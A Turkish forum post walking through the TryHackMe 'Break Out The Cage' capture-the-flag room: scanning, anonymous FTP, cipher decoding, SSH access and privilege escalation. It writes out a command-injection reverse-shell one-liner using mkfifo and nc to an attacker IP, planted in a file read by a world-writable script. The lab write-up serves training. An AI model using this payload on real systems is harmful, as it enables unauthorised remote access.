Break Out The Cage – TryHackMe

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18

Eren tarafından yazılmıştır.​


Merhaba arkadaşlar, bugün sizlerle beraber TryHackMe’de yer alan “Break Out The Cage” odasının çözümünü yapacağız.

Oda linki: https://tryhackme.com/room/breakoutthecage1

Bilgi Toplama Evresi​


nmap aracılığıyla bir tarama gerçekleştiriyoruz.

“sudo nmap -A 10.10.7.223”

nmap


Açık olan 4 tane portumuz var ve bunun yanında FTP aracılığıyla anonim olarak giriş yapabiliyoruz. Filezilla yardımıyla FTP’ye giriş yaptıktan sonra dad_tasks isimli bir dosyayı buluyoruz ve indiriyoruz.

filezilla


Dosyayı açtığımız zaman base64’le şifrelenmiş bir yazı görüyoruz ve decode ettiğimiz zaman aşağıdaki gibi bir yazı görüyoruz.

Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.

Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

Bu yazı “vignere cipher” ile şifrelenmiş. Bunu çözmemiz için bir key’e ihtiyacımız var. Açık portlara baktığımız zaman 80 portunun açık olduğunu görüyoruz ve bir web site ayağa kaldırdığını da anlamış oluyorum. Gobuster aracıyla dizinleri taramaya başlıyorum.

gobuster


Dizinleri biraz taradıktan sonra “auditions” isimli bir dizin olduğunu buluyoruz ve bunun içinde bir ses dosyası var. Ses dosyasını açınca tuhaf bir ses bizi karşılıyor. İçinde bir şeyler şifrelendiğini düşünüyorum ve AudoCity ile açıyorum. Spectrogram’a baktığım zaman “vignere cipher” ile şifrelenmiş anahtara ulaşıyorum.

audacity


Şifreyi anahtar yardımıyla çözdüğümüz zaman yeni bir yazıya ulaşıyoruz ve bize weston isimli kullanıcının şifresini veriyor.

Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.

In case I forget…. *************************************************

Aksiyon Zamanı​


weston kullanıcı adıyla ve yukarıdaki şifreyle ssh bağlantısı atıyoruz.

ssh [email protected]

Giriş yaptık, şimdi içeridekilere bakabiliriz.

“find / -user cage 2> /dev/null”

“/opt/.dads_scripts/spread_the_quotes.py” isimli dosya dikkatimi çekiyor ve içeriğe bakmak istiyorum. İçerisinde bir python script’i var ve yetkilere baktığımız zaman herkesin değiştirme yetkisine sahip olduğunu görüyorum ve bu da bana reverse shell yüklemem için sağlam bir gerekçe oluyor nihayetinde.

terminal1


Aşağıdaki komutla beraber tırnak içerisindeki dosyaya reverse shell’i yüklüyorum.

cd /opt/.dads_scripts/.files

echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes

Ve artık yetki bizde, içerideyiz
🙂
Flag’i okuyalım!

cat Super_Duper_Checklist

user.txt


Diğer yazılarımızda görüşmek üzere!
 
Moderatör tarafında düzenlendi:
Geri
Üst